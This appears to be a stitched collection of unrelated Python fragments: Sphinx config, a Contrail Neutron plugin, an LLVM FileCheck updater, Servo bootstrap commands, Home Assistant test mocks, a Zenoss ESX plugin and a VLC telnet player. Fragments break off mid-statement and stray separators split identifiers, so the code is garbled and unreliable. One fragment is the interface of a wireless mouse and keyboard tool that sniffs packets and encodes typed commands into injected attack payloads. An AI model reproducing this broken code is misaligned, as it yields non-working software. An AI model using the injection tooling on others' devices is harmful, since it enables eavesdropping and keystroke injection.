#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bandicoot', u'bandicoot Documentation',
u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'bandicoot', 'A python toolbox for mobile phone metadata',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = T |
t['id'] = resource_id
if resource:
resource_dict['resource'] = resource
resource_dict['filters'] = filters
resource_dict['fields'] = fields
return resource_dict
def _prune(self, resource_dict, fields):
if fields:
return dict(((key, item) for key, item in resource_dict.items()
if key in fields))
return resource_dict
def _transform_response(self, status_code, info=None, obj_name=None,
fields=None):
if status_code == requests.codes.ok:
if not isinstance(info, list):
return self._prune(info, fields)
else:
return [self._prune(items, fields) for items in info]
self._raise_contrail_error(status_code, info, obj_name)
def _raise_contrail_error(self, status_code, info, obj_name):
if status_code == requests.codes.bad_request:
raise ContrailBadRequestError(
msg=info['message'], resource=obj_name)
error_class = CONTRAIL_EXCEPTION_MAP[status_code]
raise error_class(msg=info['message'])
def _create_resource(self, res_type, context, res_data):
"""Create a resource in API server.
This method encodes neutron model, and sends it to the
contrail api server.
"""
for key, value in res_data[res_type].items():
if value == attr.ATTR_NOT_SPECIFIED:
del res_data[res_type][key]
res_dict = self._encode_resource(resource=res_data[res_type])
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'CREATE')
res_dicts = self._transform_response(status_code, info=res_info,
obj_name=res_type)
LOG.debug("create_%(res_type)s(): %(res_dicts)s",
{'res_type': res_type, 'res_dicts': res_dicts})
return res_dicts
def _get_resource(self, res_type, context, id, fields):
"""Get a resource from API server.
This method gets a resource from the contrail api server
"""
res_dict = self._encode_resource(resource_id=id, fields=fields)
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'READ')
res_dicts = self._transform_response(status_code, info=res_info,
fields=fields, obj_name=res_type)
LOG.debug("get_%(res_type)s(): %(res_dicts)s",
{'res_type': res_type, 'res_dicts': res_dicts})
return res_dicts
def _update_resource(self, res_type, context, id, res_data):
"""Update a resource in API server.
This method updates a resource in the contrail api server
"""
res_dict = self._encode_resource(resource_id=id,
resource=res_data[res_type])
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'UPDATE')
res_dicts = self._transform_response(status_code, info=res_info,
obj_name=res_type) |
LOG.debug("update_%(res_type)s(): %(res_dicts)s",
{'res_type': res_type, 'res_dicts': res_dicts})
return res_dicts
def _delete_resource(self, res_type, context, id):
"""Delete a resource in API server
This method deletes a resource in the contrail api server
| """
res_dict = self._encode_resource(resource_id=id)
LOG.debug("delete_%(res_type)s(): %(id)s",
{'res_type': res_type, 'id': id})
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'DELETE')
if status_code != requests.codes.ok:
self._raise_contrail_error(status_code, info=res_info,
obj_name=res_type)
def _list_resource(self, res_type, context, filters, fields):
res_dict = self._encode_resource(filters=filters, fields=fields)
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'READALL')
res_dicts = self._transform_response(status_code, info=res_info,
fields=fields, obj_name=res_type)
LOG.debug(
"get_%(res_type)s(): filters: %(filters)r data: %(res_dicts)r",
{'res_type': res_type, 'filters': filters,
'res_dicts': res_dicts})
return res_dicts
def _count_resource(self, res_type, context, filters):
res_dict = self._encode_resource(filters=filters)
status_code, res_count = self._request_backend(context, res_dict,
res_type, 'READCOUNT')
LOG.debug("get_%(res_type)s_count(): %(res_count)r",
{'res_type': res_type, 'res_count': res_count})
return res_count
def _get_network(self, context, id, fields=None):
return self._get_resource('network', context, id, fields)
def create_network(self, context, network):
"""Creates a new Virtual Network."""
return self._create_resource('network', context, network)
def get_network(self, context, network_id, fields=None):
"""Get the attributes of a particular Virtual Network."""
return self._get_network(context, network_id, fields)
def update_network(self, context, network_id, network):
"""Updates the attributes of a particular Virtual Network."""
return self._update_resource('network', context, network_id,
network)
def delete_network(self, context, network_id):
"""Creates a new Virtual Network.
Deletes the network with the specified network identifier
belonging to the specified tenant.
"""
self._delete_resource('network', context, network_id)
def get_networks(self, context, filters=None, fields=None):
"""Get the list of Virtual Networks."""
return self._list_resource('network', context, filters,
fields)
def get_networks_count(self, context, filters=None):
"""Get the count of Virtual Network."""
networks_count = self._count_resource('network', context, filters)
return networks_count['count']
def create_subnet(self, context, subnet):
"""Creates a new subnet, and assigns it a symbolic name."""
if subnet['subnet']['gateway_ip'] is None:
subnet['subnet']['gateway_ip'] = '0.0.0.0'
if subnet['subnet']['host_routes'] != attr.ATTR_NOT_SPECIFIED:
if (len(subnet['subnet']['host_routes']) >
cfg.CONF.max_subnet_host_routes):
raise exc.HostRoutesExhausted(subnet_id=subnet[
'subnet'].get('id', _('new subnet')),
quota=cfg.CONF.max_subnet_host_routes)
subnet_created = self._create_resource('subnet', context, subnet)
return self._make_subnet_dict(subnet_created)
def _make_subnet_dict(self, subnet):
if 'gateway_ip' in subnet and subnet['gateway_ip'] == '0.0.0.0':
subnet['gateway_ip'] = None
return subnet
def _get_subnet(self, context, subnet_id, fields=None):
subnet = self._get_resource('subnet', context, subnet_id, fields)
return self._make_subnet_dict(subnet)
def get_subnet(self, context, subnet_id, fields=None):
"""Get the attributes of a particular subnet."""
return self._get_subnet(context, subnet_id, fields)
def update_subnet(self, context, subnet_id, subnet):
"""Updates the attributes of a particular subnet."""
subnet = self._update_resource('subnet', context, subnet_id, subnet)
return self._make_subnet_dict(subnet)
def delete_subnet(self, context, subnet_id):
|
#!/usr/bin/env python3
"""A script to generate FileCheck statements for 'opt' analysis tests.
This script is a utility to update LLVM opt analysis test cases with new
FileCheck patterns. It can either update all of the tests in the file or
a single test function.
Example usage:
$ update_analyze_test_checks.py --opt=../bin/opt test/foo.ll
Workflow:
1. Make a compiler patch that requires updating some number of FileCheck lines
in regression test files.
2. Save the patch and revert it from your local work area.
3. Update the RUN-lines in the affected regression tests to look canonical.
Example: "; RUN: opt < %s -analyze -cost-model -S | FileCheck %s"
4. Refresh the FileCheck lines for either the entire file or select functions by
running this script.
5. Commit the fresh baseline of checks.
6. Apply your patch from step 1 and rebuild your local binaries.
7. Re-run this script on affected regression tests.
8. Check the diffs to ensure the script has done something reasonable.
9. Submit a patch including the regression test diffs for review.
A common pattern is to have the script insert complete checking of every
instruction. Then, edit it down to only check the relevant instructions.
The script is designed to make adding checks to a test case fast, it is *not*
designed to be authoratitive about what constitutes a good test!
"""
from __future__ import print_function
import argparse
import glob
import itertools
import os # Used to advertise this file's name ("autogenerated_note").
import string
import subprocess
import sys
import tempfile
import re
from UpdateTestChecks import common
ADVERT = '; NOTE: Assertions have been autogenerated by '
def main():
from argparse import RawTextHelpFormatter
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument('--opt-binary', default='opt',
help='The opt binary used to generate the test case')
parser.add_argument(
'--function', help='The function in the test file to update')
parser.add_argument('tests', nargs='+')
args = common.parse_commandline_args(parser)
script_name = os.path.basename(__file__)
autogenerated_note = (ADVERT + 'utils/' + script_name)
opt_basename = os.path.basename(args.opt_binary)
if (opt_basename != "opt"):
common.error('Unexpected opt name: ' + opt_basename)
sys.exit(1)
test_paths = [test for pattern in args.tests for test in glob.glob(pattern)]
for test in test_paths:
with open(test) as f:
input_lines = [l.rstrip() for l in f]
first_line = input_lines[0] if input_lines else ""
if 'autogenerated' in first_line and script_name not in first_line:
common.warn("Skipping test which wasn't autogenerated by " + script_name + ": " + test)
continue
if args.update_only:
if not first_line or 'autogenerated' not in first_line:
common.warn("Skipping test which isn't autogenerated: " + test)
continue
run_lines = common.find_run_lines(test, input_lines)
prefix_list = []
for l in run_lines:
if '|' not in l:
common.warn('Skipping unparseable RUN line: ' + l)
continue
(tool_cmd, filecheck_cmd) = tuple([cmd.strip() for cmd in l.split('|', 1)])
common.verify_filecheck_prefixes(filecheck_cmd)
if not tool_cmd.startswith(opt_basename + ' '):
common.warn('WSkipping non-%s RUN line: %s' % (opt_basename, l))
continue
if not filecheck_cmd.startswith('FileCheck '):
common.warn('Skipping non-FileChecked RUN line: ' + l)
continue
tool_cmd_args = tool_cmd[len(opt_basename):].strip()
tool_cmd_args = tool_cmd_args.replace('< %s', '').replace('%s', '').strip()
check_prefixes = [item for m in common.CHECK_P | REFIX_RE.finditer(filecheck_cmd)
for item in m.group(1).split(',')]
if not check_prefixes:
check_prefixes = ['CHECK']
# FIXME: We should use multiple check prefixes to common ch | eck lines. For
# now, we just ignore all but the last.
prefix_list.append((check_prefixes, tool_cmd_args))
func_dict = {}
for prefixes, _ in prefix_list:
for prefix in prefixes:
func_dict.update({prefix: dict()})
for prefixes, opt_args in prefix_list:
common.debug('Extracted opt cmd:', opt_basename, opt_args, file=sys.stderr)
common.debug('Extracted FileCheck prefixes:', str(prefixes), file=sys.stderr)
raw_tool_outputs = common.invoke_tool(args.opt_binary, opt_args, test)
# Split analysis outputs by "Printing analysis " declarations.
for raw_tool_output in re.split(r'Printing analysis ', raw_tool_outputs):
common.build_function_body_dictionary(
common.ANALYZE_FUNCTION_RE, common.scrub_body, [],
raw_tool_output, prefixes, func_dict, args.verbose, False, False)
is_in_function = False
is_in_function_start = False
prefix_set = set([prefix for prefixes, _ in prefix_list for prefix in prefixes])
common.debug('Rewriting FileCheck prefixes:', str(prefix_set), file=sys.stderr)
output_lines = []
output_lines.append(autogenerated_note)
for input_line in input_lines:
if is_in_function_start:
if input_line == '':
continue
if input_line.lstrip().startswith(';'):
m = common.CHECK_RE.match(input_line)
if not m or m.group(1) not in prefix_set:
output_lines.append(input_line)
continue
# Print out the various check lines here.
common.add_analyze_checks(output_lines, ';', prefix_list, func_dict, func_name)
is_in_function_start = False
if is_in_function:
if common.should_add_line_to_output(input_line, prefix_set):
# This input line of the function body will go as-is into the output.
# Except make leading whitespace uniform: 2 spaces.
input_line = common.SCRUB_LEADING_WHITESPACE_RE.sub(r' ', input_line)
output_lines.append(input_line)
else:
continue
if input_line.strip() == '}':
is_in_function = False
continue
# Discard any previous script advertising.
if input_line.startswith(ADVERT):
continue
# If it's outside a function, it just gets copied to the output.
output_lines.append(input_line)
m = common.IR_FUNCTION_RE.match(input_line)
if not m:
continue
func_name = m.group(1)
if args.function is not None and func_name != args.function:
# When filtering on a specific function, skip all others.
continue
is_in_function = is_in_function_start = True
common.debug('Writing %d lines to %s...' % (len(output_lines), test))
with open(test, 'wb') as f:
f.writelines(['{}\n'.format(l).encode('utf-8') for l in output_lines])
if __name__ == '__main__':
main()
|
size is not None:
pct = recved * 100.0 / fsize
print("\rDownloading %s: %5.1f%%" % (desc, pct), end="")
sys.stdout.flush()
writer.write(chunk)
if not dumb:
print()
except urllib2.HTTPError, e:
print("Download failed (%d): %s - %s" % (e.code, e.reason, src))
sys.exit(1)
def download_file(desc, src, dst):
with open(dst, 'wb') as fd:
download(desc, src, fd)
def download_bytes(desc, src):
content_writer = StringIO.StringIO()
download(desc, src, content_writer)
return content_writer.getvalue()
def extract(src, dst, movedir=None):
tarfile.open(src).extractall(dst)
if movedir:
for f in os.listdir(movedir):
frm = path.join(movedir, f)
to = path.join(dst, f)
os.rename(frm, to)
os.rmdir(movedir)
os.remove(src)
@CommandProvider
class MachCommands(CommandBase):
@Command('env',
description='Print environment setup commands',
category='bootstrap')
def env(self):
env = self.build_env()
print("export PATH=%s" % env["PATH"])
if sys.platform == "darwin":
print("export DYLD_LIBRARY_PATH=%s" % env["DYLD_LIBRARY_PATH"])
else:
print("export LD_LIBRARY_PATH=%s" % env["LD_LIBRARY_PATH"])
@Command('bootstrap-rust',
description='Download the Rust compiler',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if a copy already exists')
def bootstrap_rustc(self, force=False):
rust_dir = path.join(
self.context.sharedir, "rust", self.rust_path())
if not force and path.exists(path.join(rust_dir, "rustc", "bin", "rustc" + BIN_SUFFIX)):
print("Rust compiler already downloaded.", end=" ")
print("Use |bootstrap-rust --force| to download again.")
return
if path.isdir(rust_dir):
shutil.rmtree(rust_dir)
os.makedirs(rust_dir)
date = self.rust_path().split("/")[0]
install_dir = path.join(self.context.sharedir, "rust", date)
# The Rust compiler is hosted on the nightly server under the date with a name
# rustc-nightly-HOST-TRIPLE.tar.gz. We just need to pull down and extract it,
# giving a directory name that will be the same as the tarball name (rustc is
# in that directory).
rustc_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s.tar.gz"
% self.rust_path())
tgz_file = rust_dir + '-rustc.tar.gz'
download_file("Rust compiler", rustc_url, tgz_file)
print("Extracting Rust compiler...")
extract(tgz_file, install_dir)
# Each Rust stdlib has a name of the form `rust-std-nightly-TRIPLE.tar.gz`, with
# a directory of the name `rust-std-TRIPLE` inside and then a `lib` directory.
# This `lib` directory needs to be extracted and merged with the `rustc/lib`
# directory from the host compiler above.
# TODO: make it possible to request an additional cross-target to add to this
# list.
stdlibs = [host_triple(), "arm-linux-androideabi"]
for target in stdlibs:
std_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/%s/rust-std-nightly-%s.tar.gz"
% (date, target))
tgz_file = install_dir + ('rust-std-nightly-%s.tar.gz' % target)
download_file("Host rust library for target %s" % target, s | td_url, tgz_file)
print("Extracting Rust stdlib for target %s..." % target)
extract(tgz_file, install_dir)
shutil.copytree(path.join(install_dir, "rust-std-nightly-%s" % target,
| "rust-std-%s" % target, "lib", "rustlib", target),
path.join(install_dir, "rustc-nightly-%s" % host_triple(),
"rustc", "lib", "rustlib", target))
shutil.rmtree(path.join(install_dir, "rust-std-nightly-%s" % target))
print("Rust ready.")
@Command('bootstrap-rust-docs',
description='Download the Rust documentation',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if docs already exist')
def bootstrap_rustc_docs(self, force=False):
self.ensure_bootstrapped()
rust_root = self.config["tools"]["rust-root"]
docs_dir = path.join(rust_root, "doc")
if not force and path.exists(docs_dir):
print("Rust docs already downloaded.", end=" ")
print("Use |bootstrap-rust-docs --force| to download again.")
return
if path.isdir(docs_dir):
shutil.rmtree(docs_dir)
docs_name = self.rust_path().replace("rustc-", "rust-docs-")
docs_url = ("https://static-rust-lang-org.s3.amazonaws.com/dist/rust-docs-nightly-%s.tar.gz"
% host_triple())
tgz_file = path.join(rust_root, 'doc.tar.gz')
download_file("Rust docs", docs_url, tgz_file)
print("Extracting Rust docs...")
temp_dir = path.join(rust_root, "temp_docs")
if path.isdir(temp_dir):
shutil.rmtree(temp_dir)
extract(tgz_file, temp_dir)
shutil.move(path.join(temp_dir, docs_name.split("/")[1],
"rust-docs", "share", "doc", "rust", "html"),
docs_dir)
shutil.rmtree(temp_dir)
print("Rust docs ready.")
@Command('bootstrap-cargo',
description='Download the Cargo build tool',
category='bootstrap')
@CommandArgument('--force', '-f',
action='store_true',
help='Force download even if cargo already exists')
def bootstrap_cargo(self, force=False):
cargo_dir = path.join(self.context.sharedir, "cargo",
self.cargo_build_id())
if not force and path.exists(path.join(cargo_dir, "cargo", "bin", "cargo" + BIN_SUFFIX)):
print("Cargo already downloaded.", end=" ")
print("Use |bootstrap-cargo --force| to download again.")
return
if path.isdir(cargo_dir):
shutil.rmtree(cargo_dir)
os.makedirs(cargo_dir)
tgz_file = "cargo-nightly-%s.tar.gz" % host_triple()
nightly_url = "https://static-rust-lang-org.s3.amazonaws.com/cargo-dist/%s/%s" % \
(self.cargo_build_id(), tgz_file)
download_file("Cargo nightly", nightly_url, tgz_file)
print("Extracting Cargo nightly...")
nightly_dir = path.join(cargo_dir,
path.basename(tgz_file).replace(".tar.gz", ""))
extract(tgz_file, cargo_dir, movedir=nightly_dir)
print("Cargo ready.")
@Command('update-hsts-preload',
description='Download the HSTS preload list',
category='bootstrap')
def bootstrap_hsts_preload(self, force=False):
preload_filename = "hsts_preload.json"
preload_path = path.join(self.context.topdir, "resources")
chromium_hsts_url = "https://chromium.googlesource.com/chromium/src" + \
"/net/+/master/http/transport_security_state_static.json?format=TEXT"
try:
content_base64 = download_bytes("Chromium HSTS preload list", chromium_hsts_url)
except urllib2.URLError:
print("Unable to download chromium HSTS preload list; are you connected to the internet?")
sys.exit(1)
content_decoded = base64.b64decode(content_base64)
# The chromium "json" has single line comments in it which, of course,
# are non-standard/non-valid json. Simply strip them out before parsing
content_json = re.sub(r'(^|\s+)//.*$', '', content_decoded, flags=re.MULTILINE)
try:
pins_and_static_preloads = json.loads(content_json)
entries = {
|
between different classes and scripts.
'''
import sys
sys.path.append("..")
from array import array
from utils import display
from utils.device import *
from lib import common
command = ''
devices = []
deviceID = None
menu = []
channel_time = None
strict_match = None
# Add a new device to the devices
def add_device(address, channel, payload):
from player import Player
def redo_scan(channel):
if Player.feature_ping < Player.last_ping:
global channel_time
# Pause Player correctly
while not Player._pause:
Player._flag.clear()
# Set channel
Player.channel = channel
common.radio.set_channel(channel)
# Set feature_ping to keep receiving payloads on this channel for few seconds
Player.feature_ping = Player.last_ping + common.timeout + channel_time
# Resume Player
Player._flag.set()
global devices
# Search in devices list
for i in range(len(devices)):
if address == devices[i].address:
# Update device's channels
if channel not in devices[i].channels:
devices[i].channels.append(channel)
devices[i].channels.sort()
# Update the device's payloads if it satifies the following requirements
if devices[i].model == None and len(payload) > 0 and payload not in devices[i].payloads:
devices[i].payloads.append(payload)
# Update device
devices[i] = match_device(address, devices[i].channels, devices[i].payloads)
# Keep scanning on this channel to verify the device if the device was not recognized
if devices[i].model == None:
redo_scan(channel)
else:
Player.feature_ping = Player.last_ping
break
# Add a new device to the devices
else:
payloads = []
if len(payload) > 0: payloads.append(payload)
devices.append(match_device(address, [channel], payloads))
# Found new device, keep scanning on this channel to verify the device
redo_scan(channel)
# Display the scanned the result
update_scanner_msg()
def update_scanner_msg():
global devices, menu
# Update selection limit
menu = range(len(devices))
msg = []
msg.append('----------------------------------SCAN DEVICES----------------------------------')
msg.append('{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'.format(
'No.', 'Address', 'Channels', 'Vendor', 'Model', 'Status'))
for i in range(len(devices)):
msg.append('{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'.format(
i+1,
':'.join('{:02X}'.format(b) for b in devices[i].address),
','.join(str(c) for c in devices[i].channels),
devices[i].vendor,
devices[i].model,
devices[i].status))
# Refresh display
display.refresh(msg)
def update_device(address, channel, payload):
global devices, deviceID
# Search in devices list
device = devices[deviceID]
# Update device's channels
if channel not in device.channels:
device.channels.append(channel)
device.channels.sort()
# Update device's payloads if it satifies the following requirements
if len(payload) > 0 and payload not in device.payloads:
device.payloads.append(payload)
# Update device
device = match_device(device.address, device.channels, device.payloads)
# Renew device
devices[deviceID] = device
if device.model != None:
# Pause player
from player import Player
Player._flag.set()
# # Update channels
# update_channels()
update_tasks_msg()
else:
update_matcher_msg()
def update_tasks_msg():
global devices, deviceID, menu
device = devices[deviceID]
msg = []
msg.append('----------------------------------SELECT TASKS----------------------------------')
msg.append('You selected: {0} ({1} {2})'.format(
':'.join('{:02X}'.format(b) for b in device.address),
device.vendor, device.model))
menu = range(2)
msg.append('{0:<6}{1}'.format('No.', 'Task'))
msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
# Refresh display
display.refresh(msg)
def update_matcher_msg():
global devices, deviceID, menu
device = devices[deviceID]
msg = []
msg.append('----------------------------------SELECT TASKS----------------------------------')
msg.append('You selected: {0} ({1} {2})'.format(
':'.join('{:02X}'.format(b) for b in device.address),
device.vendor, device.model))
menu = []
# msg.append('{0:<6}{1}'.format('No.', 'Task'))
# msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
# msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
msg.append('')
msg.append('* Tasks is not avaliable right now because the device has not been located yet.')
msg.append('* It may take minites to locate the device, please wait...')
msg.append('')
#### Test Code For Monitoring payloads
l = len(device.payloads)
ls = l > 10 and l-10 or 0
for i in range(ls, l):
msg.append('{0:<10}{1}'.format(
i+1,
':'.join('{:02X}'.format(b) for b in device.payloads[i])))
####
# Refresh display
display.refresh(msg)
def update_sniffer_msg():
global menu, devices, deviceID
device = devices[deviceID]
menu = []
msg = []
msg.append('-------- | --------------------------SNIFF PACKETS---------------------------------')
msg.append('{0:<10}{1} {2}'.format('Device: ', device.vendor, device.model))
msg.append('{0:<10}{1}'.format('Address: ', ':'.join('{:02X}'.format(b) for b in device.address)))
msg.append('{0:<10}{1}'.format('Channels: ', ', '.join(str(c) for c in device.channels)))
payload = array('B', [])
# channel = None
from player import Player
if len(Player.records) > 0:
# channel = Player.records[0][0]
payload = Pla | yer.records[0][1]
del Player.records[0]
# msg.append('{0:<10}{1}'.format('Channel: ', channel))
msg.append('')
# Acquire the decoder path
decoder ='{0}.decode'.format(devices[deviceID].moduler)
try:
# Decode the payload
for m in eval(decoder)(payload):
msg.append(m)
except Exception as e:
msg.append(str(e))
# Refresh display
display.refresh(msg)
# The following method also has to been optimised
def update_attacker_msg(ping_rate=0):
global menu, devices, deviceID
device = devices[deviceID]
menu = []
msg = []
msg.append('----------------------------------LAUNCH ATTACK---------------------------------')
msg.append('{0:<9}{1} {2} {3}'.format('Device', ':', device.vendor, device.model))
msg.append('{0:<9}{1} {2}'.format('Address', ':', ':'.join('{:02X}'.format(b) for b in device.address)))
msg.append('{0:<9}{1} {2}'.format('Channels', ':', ', '.join(str(c) for c in device.channels)))
from player import Player
status = len(Player.payloads) > 0 and 'Attacking...' or 'No attack request found.'
msg.append('{0:<9}{1} {2}'.format('Status', ':', status))
# Refresh ping rate
msg.append('{0:<9}{1} {2:<4}{3}'.format('Ping rate', ':', int(ping_rate), 'pks/s'))
msg.append('')
msg.append('----------------------------------ATTACK HISTORY--------------------------------')
msg.append('{0:<5}{1:<4}{2}'.format('No.', 'Ch.', 'Payload'))
l = len(Player.records)
ls = l > 10 and l-10 or 0
for i in range(ls, l):
msg.append('{0:<5}{1:<4}{2}'.format(i+1, Player.records[i][0], Player.records[i][1]))
# Refresh display
display.refresh(msg)
# Parse attack commands
def parse_attack_commands(cmds):
# Parse commands
global devices, deviceID
def split_command(cs):
cmds = []
i = 0
while i < len(cs):
if cs[i] == '<':
new_cs = ''
while i+1 < len(cs) and cs[i+1] != '>':
i += 1
new_cs += cs[i]
cmds.append(new_cs)
i += 1
else:
cmds.append(cs[i])
i +=1
return cmds
# Convert command list into payload list
# and append them into Player.payloads
device = devices[deviceID]
payloads = []
# from utils.devices import amazonbasics, logitech_mouse
encoder ='{0}.encode'.format(device.moduler)
for cmd in split_command(cmds):
# self.add_record(['CMD', cmd])
for payload in eval(encoder)(cmd, device):
payloads.append(payload)
retu |
"""Tests for the AVM Fritz!Box integration."""
from __future__ import annotations
from typing import Any
from unittest.mock import Mock
from homeassistant.components.fritzbox.const import DOMAIN
from homeassistant.core import HomeAssistant
from .const import (
CONF_FAKE_AIN,
CONF_FAKE_MANUFACTURER,
CONF_FAKE_NAME,
CONF_FAKE_PRODUCTNAME,
)
from tests.common import MockConfigEntry
async def setup_config_entry(
hass: HomeAssistant,
data: dict[str, Any],
unique_id: str = "any",
device: Mock = None,
fritz: Mock = None,
) -> bool:
"""Do setup of a MockConfigEntry."""
entry = MockConfigEntry(
domain=DOMAIN,
data=data,
unique_id=unique_id,
)
entry.add_to_hass(hass)
if device is not None and fritz is not None:
fritz().get_devices.return_value = [device]
result = await hass.config_entries.async_setup(entry.entry_id)
if device is not None:
await hass.async_block_till_done()
return result
class FritzDeviceBaseMock(Mock):
"""base mock of a AVM Fritz!Box binary sensor device."""
ain = CONF_FAKE_AIN
manufacturer = CONF_FAKE_MANUFACTURER
name = CONF_FAKE_NAME
productname = CONF_FAKE_PRODUCTNAME
class FritzDeviceBinarySensorMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box binary sensor device."""
alert_state = "fake_state"
battery_level = 23
fw_version = "1.2.3"
has_alarm = True
has_powermeter = False
has_switch = False
has_temperature_sensor = False
has_thermostat = False
present = True
class FritzDeviceClimateMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box climate device."""
actual_temperature = 18.0
alert_state = "fake_state"
battery_level = 23
battery_low = True
comfort_temperature = 22.0
device_lock = "fake_locked_device"
eco_temperature = 16.0
fw_version = "1.2.3"
has_alarm = False
has_powermeter = False
has_switch = False
has_temperature_sensor = False
has_thermostat = True
holiday_active = "fake_holiday"
lock = "fake_locked"
present = True
summer_active = "fake_summer"
target_temperature = 19.5
window_open = "fake_window"
class FritzDeviceSensorMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box sensor device."""
battery_level = 23
device_lock = "fake_locked_device"
fw_version = "1.2.3"
has_alarm = False
has_powermeter = False
has_switch = False
has_temperature_sensor = True
has_thermostat = False
lock = "fake_locked"
present = True
temperature = 1.23
rel_humidity = 42
class FritzDeviceSwitchMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box switch device."""
battery_level = None
device_lock = "fake_locked_device"
energy = 1234
voltage = 230
fw_version = "1.2.3"
has_alarm = False
has_powermeter = True
has_switch = True
has_temperature_sensor = True
has_thermostat = Fals | e
switch_state = "fake_state"
lock = "fa | ke_locked"
power = 5678
present = True
temperature = 1.23
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2009, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
__doc__="""Esx
Plugin to gather information about virtual machines running
under a VMWare ESX server v3.0
"""
import Globals
from Products.DataCollector.plugins.CollectorPlugin \
import SnmpPlugin, GetTableMap
from Products.DataCollector.plugins.DataMaps \
import ObjectMap
class Esx(SnmpPlugin):
# compname = "os"
relname = "guestDevices"
modname = 'ZenPacks.zenoss.ZenossVirtualHostMonitor.VirtualMachine'
columns = {
'.1': 'snmpindex',
'.2': 'displayName',
'.4': 'osType',
'.5': 'memory',
'.6': 'adminStatus',
'.7': 'vmid',
'.8': 'operStatus',
}
snmpGetTableMaps = (
GetTableMap('vminfo', '.1.3.6.1.4.1.6876.2.1.1', columns),
)
def process(self, device, results, log | ):
log.info('processing %s for device %s', self.name(), device.id)
getdata, tabledata = results
table = tabledata.get("vminfo")
rm | = self.relMap()
for info in table.values():
info['adminStatus'] = info['adminStatus'] == 'poweredOn'
info['operStatus'] = info['operStatus'] == 'running'
info['snmpindex'] = info['vmid']
del info['vmid']
om = self.objectMap(info)
om.id = self.prepId(om.displayName)
rm.append(om)
return [rm]
|
"""Provide functionality to interact with the vlc telnet interface."""
import logging
from python_telnet_vlc import ConnectionError as ConnErr, VLCTelnet
import voluptuous as vol
from homeassistant.components.media_player import PLATFORM_SCHEMA, MediaPlayerDevice
from homeassistant.components.media_player.const import (
MEDIA_TYPE_MUSIC,
SUPPORT_CLEAR_PLAYLIST,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SEEK,
SUPPORT_SHUFFLE_SET,
SUPPORT_STOP,
SUPPORT_VOLUME_MUTE,
SUPPORT_VOLUME_SET,
)
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
STATE_IDLE,
STATE_PAUSED,
STATE_PLAYING,
STATE_UNAVAILABLE,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DOMAIN = "vlc_telnet"
DEFAULT_NAME = "VLC-TELNET"
DEFAULT_PORT = 4212
SUPPORT_VLC = (
SUPPORT_PAUSE
| SUPPORT_SEEK
| SUPPORT_VOLUME_SET
| SUPPORT_VOLUME_MUTE
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_CLEAR_PLAYLIST
| SUPPORT_PLAY
| SUPPORT_SHUFFLE_SET
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the vlc platform."""
add_entities(
[
VlcDevice(
config.get(CONF_NAME),
config.get(CONF_HOST),
| config.get(CONF_PORT),
config.get(CONF_PASSWORD),
)
],
True,
)
class VlcDevice(MediaPlayerDevice):
"""Representation of a vlc player."""
def __init__(self, name, host, port, passwd):
"""Initialize the vlc device."""
self._instance = None
self._name = name
self._volume = None
self._muted = None
self._state = STATE_UNAVAILABLE
self._media_position_updated_at = None
self._media_position = None
self._media_duration = None
self._host = host
self._port = port
self._password = passwd
self._vlc = None
self._available = False
self._volume_bkp = 0
self._media_artist = ""
self._media_title = ""
def update(self):
"""Get the latest details from the device."""
if self._vlc is None:
try:
self._vlc = VLCTelnet(self._host, self._password, self._port)
self._state = STATE_IDLE
self._available = True
except (ConnErr, EOFError):
self._available = False
self._vlc = None
else:
try:
status = self._vlc.status()
if status:
if "volume" in status:
self._volume = int(status["volume"]) / 500.0
else:
self._volume = None
if "state" in status:
state = status["state"]
if state == "playing":
self._state = STATE_PLAYING
elif state == "paused":
self._state = STATE_PAUSED
else:
self._state = STATE_IDLE
else:
self._state = STATE_IDLE
self._media_duration = self._vlc.get_length()
self._media_position = self._vlc.get_time()
info = self._vlc.info()
if info:
self._media_artist = info[0].get("artist")
self._media_title = info[0].get("title")
